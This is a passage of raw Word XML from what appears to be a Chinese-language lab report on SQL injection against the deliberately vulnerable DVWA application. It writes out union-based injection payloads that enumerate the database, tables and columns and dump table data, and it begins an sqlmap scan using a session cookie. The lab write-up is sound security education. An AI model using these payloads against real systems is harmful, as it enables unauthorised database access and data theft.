              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="008F04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，查询成功</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="008F04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>说明存在字符型注入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，如下图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAF97CE" w14:textId="38A77630" w:rsidR="008F04D5" w:rsidRDefault="003B53D9" w:rsidP="00316232">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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67DCBEFC" wp14:editId="788F530C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179415</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3088640" cy="1208405"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0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12-10 at 6.28.46 P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04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取当前数据库名：输入</w:t>
            </w:r>
            <w:r w:rsidR="00B922BD" w:rsidRPr="00B922BD">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1' union select 2333,database() #</w:t>
            </w:r>
            <w:r w:rsidR="00B922BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="008F04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>查询成功，说明当前数据库名为</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008F04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B922BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，如下图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44422209" w14:textId="21724AAC" w:rsidR="00B922BD" w:rsidRDefault="003D6133" w:rsidP="00316232">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/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6123C0EF" wp14:editId="417444A8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1899920</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3088640" cy="1411605"/>
                  <wp:effectExtent l="0" t="0" r="0" b="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12-10 at 6.36.17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2BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取数据库中的表：输入</w:t>
            </w:r>
            <w:r w:rsidR="00457B0A" w:rsidRPr="00457B0A">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1' union select 2333,table_name from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00457B0A" w:rsidRPr="00457B0A">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>information_schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00457B0A" w:rsidRPr="00457B0A">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00457B0A" w:rsidRPr="00457B0A">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>table_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00457B0A" w:rsidRPr="00457B0A">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>='</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00457B0A" w:rsidRPr="00457B0A">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00457B0A" w:rsidRPr="00457B0A">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>' #</w:t>
            </w:r>
            <w:r w:rsidR="00457B0A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，查询成功，说明</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00457B0A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00457B0A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>数据库中共有</w:t>
            </w:r>
            <w:r w:rsidR="00457B0A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00457B0A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>张表：</w:t>
            </w:r>
            <w:r w:rsidR="00457B0A" w:rsidRPr="00457B0A">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>guestbook</w:t>
            </w:r>
            <w:r w:rsidR="00457B0A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00457B0A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidR="00457B0A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00457B0A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，如下图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C6288DA" w14:textId="4082913A" w:rsidR="002604B9" w:rsidRDefault="003D6133" w:rsidP="00316232">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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2336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DAD64C9" wp14:editId="1EC245DA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1954490</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3088640" cy="137160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12-10 at 6.41.13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64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04B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取表中字段名：简便起见以下只列出</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表中的字段，输入</w:t>
            </w:r>
            <w:r w:rsidR="002604B9" w:rsidRPr="002604B9">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1' union select 2333,column_name from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002604B9" w:rsidRPr="002604B9">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>information_schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002604B9" w:rsidRPr="002604B9">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002604B9" w:rsidRPr="002604B9">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002604B9" w:rsidRPr="002604B9">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>='locations' #</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>查询成功，说明</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表中共有</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>列：</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>latitude</w:t>
            </w:r>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>longtitude</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002604B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，如下图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A4356C" w14:textId="61ACFEAD" w:rsidR="00457B0A" w:rsidRPr="00F34F53" w:rsidRDefault="006D6B6C" w:rsidP="00457B0A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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获取表中的所有数据：简便起见以下只获取了</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表中的数据，输入</w:t>
            </w:r>
            <w:r w:rsidR="008453F6" w:rsidRPr="008453F6">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1' union select </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008453F6" w:rsidRPr="008453F6">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>group_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008453F6" w:rsidRPr="008453F6">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">(name), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008453F6" w:rsidRPr="008453F6">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>group_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008453F6" w:rsidRPr="008453F6">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">(latitude,' ', </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008453F6" w:rsidRPr="008453F6">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>longtitude</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008453F6" w:rsidRPr="008453F6">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>) from locations #</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，注意此处使用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>group</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>保证</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>union</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的查询包含的列数都为</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。查询成功，说明</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表中共有</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>条数</w:t>
            </w:r>
            <w:r w:rsidR="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:noProof/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45AF7EEB" wp14:editId="432AEFFD">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1143000</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>584180</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3567430" cy="1275080"/>
                  <wp:effectExtent l="0" t="0" r="127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12-10 at 11.04.44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430" cy="127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67B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>据元组：</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r w:rsidR="003667B4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>字段分别为</w:t>
            </w:r>
            <w:r w:rsidR="003667B4" w:rsidRPr="003667B4">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Yi</w:t>
            </w:r>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003667B4" w:rsidRPr="003667B4">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fu</w:t>
            </w:r>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003667B4" w:rsidRPr="003667B4">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Building</w:t>
            </w:r>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Guanghua</w:t>
            </w:r>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Building</w:t>
            </w:r>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Xianghui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008453F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Auditorium</w:t>
            </w:r>
            <w:r w:rsidR="008F1AF7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="080E8B04" w14:textId="13F644F2" w:rsidR="00B922BD" w:rsidRDefault="00A56FDF" w:rsidP="00B922BD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使用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B0BB81" w14:textId="6285798A" w:rsidR="00A56FDF" w:rsidRDefault="00A15D39" w:rsidP="00B922BD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00316232">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00316232">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidRPr="00316232">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安全级别为</w:t>
            </w:r>
            <w:r w:rsidRPr="00316232">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD032A3" w14:textId="53BD7A47" w:rsidR="00A15D39" w:rsidRDefault="00A15D39" w:rsidP="00A15D39">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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先检测是否存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入漏洞：使用命令</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A15D39">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A15D39">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u 'http://10.211.55.13/dvwa/vulnerabilities/sqli/?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E83AA3E" w14:textId="534F7F35" w:rsidR="00A15D39" w:rsidRDefault="00A15D39" w:rsidP="00A15D39">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A15D39">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id=1&amp;Submit=Submit#'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A15D39">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>--cookie='security=low; PHPSESSID=10ce72b2e3f3ea5aa29a1492b7901c4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D76353" w14:textId="768C9ABD" w:rsidR="00A15D39" w:rsidRDefault="00105B6C" w:rsidP="00A15D39">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="780"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4384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19AFBFC3" wp14:editId="6E85CF99">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2151425</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>412750</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1956435" cy="155194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12-10 at 10.40.38 P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35" cy="155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5D39" w:rsidRPr="00A15D39">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">7' </w:t>
            </w:r>
            <w:r w:rsidR="00A15D39">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="00A15D39" w:rsidRPr="00A15D39">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>batch</w:t>
            </w:r>
            <w:r w:rsidR="00A15D39">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A15D39" w:rsidRPr="00A15D39">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>采用默认选项</w:t>
            </w:r>
            <w:r w:rsidR="00A15D39">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>扫描页面，</w:t>
            </w:r>
            <w:r w:rsidR="008D7282">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>其中</w:t>
            </w:r>
            <w:r w:rsidR="008D7282">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie</w:t>
            </w:r>
            <w:r w:rsidR="008D7282">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>值在浏览器中的开发者工具中获取。</w:t>
            </w:r>
            <w:r w:rsidR="009275E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>结果如下图，该页面存在</w:t>
            </w:r>
            <w:r w:rsidR="009275E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="009275E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D76291D" w14:textId="587098BE" w:rsidR="006F79FA" w:rsidRPr="006F79FA" w:rsidRDefault="006F79FA" w:rsidP="006F79FA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
